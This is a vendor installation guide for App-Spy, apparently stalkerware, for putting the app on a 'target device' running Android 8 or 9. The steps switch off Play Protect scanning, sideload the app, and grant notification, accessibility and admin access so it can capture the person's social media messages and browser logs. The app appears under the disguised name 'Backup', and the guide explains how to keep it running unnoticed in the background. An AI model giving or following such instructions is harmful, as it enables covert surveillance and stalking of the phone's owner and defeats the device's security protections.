The different thing about Android 8 and 9 installation process is to give "Unknown access" to the browser you are installing our app from, not our app directly. In this guide we are using Google Chrome browser but you can use any other browser and the steps are the same.
For install guide on devices with Android 2.3 - 7 operating system please check the Android 2.3 - 7 install guide
For install guide on devices with Android 10 and 11 operating system please check the Android 10 and 11 install guide
Here is the full Android 8 and 9 install guide:
1. Go to Google Play on the target device -> tap on the menu icon -> select Play Protect -> go to Play Protect Settings icon in the right corner and Switch OFF the "Scan all installed apps". Confirm it.
2. Open the browser (in our case it is Chrome) and type https://app-spy.com/download
Insert the Captcha code and download the app.
3. Tap on Install. You'll receive a notification from the browser app (in our case it is Chrome) that your phone is not allowed to install apps from this source. You'll need to give permission, so tap on "Settings"
4. You'll be redirected to the "Install unknown apps" page and enable "Allow from this source". Now you can go to the initial page to continue the install.
5. Now open the application.
6. Now you'll need to register an account if it is the first time you install the app on this device with an email and password or just enter your password if you re-install the app because you email will be inserted by default.
7. Next steps are to enable notifications access in order to have incoming social media messages so please make sure to enable it for Backup (that is actually App-Spy on the target device).
8. Next steps are to enable accessibility access n order to have outgoing social media messages and browser logs, so please make sure to enable it for Backup (that is actually App-Spy on the target device).
9. Next, in the warnings, you can also enable app usage and to enable administrator rights.
Note: Starting Android 5 the app can be uninstalled even with admin rights enabled. However, this feature has other uses as well (for some Live control commands).
10. After you enabled everything you can click on the Back and after Exit buttons.
App-Spy is now installed and in a while you can check the logs by logging in on our website with registered email address and password.
With each new version of Android, devices have more inbuilt task killers especially on some models where the Android OS is more customized. Most of these task killers are targeting apps that work in background such as our app. This is why we insist to follow the steps to disable inbuilt task killers by selecting your model (or steps from II) and Android version. By doing these steps App-Spy will work without interruptions.
We also insist on doing some steps to make App-Spy working in foreground: enable notification for App-Spy
NOTE: Android is a registered trademark of GOOGLE LLC. For more information on Android in general and its versions you can go to the Android page.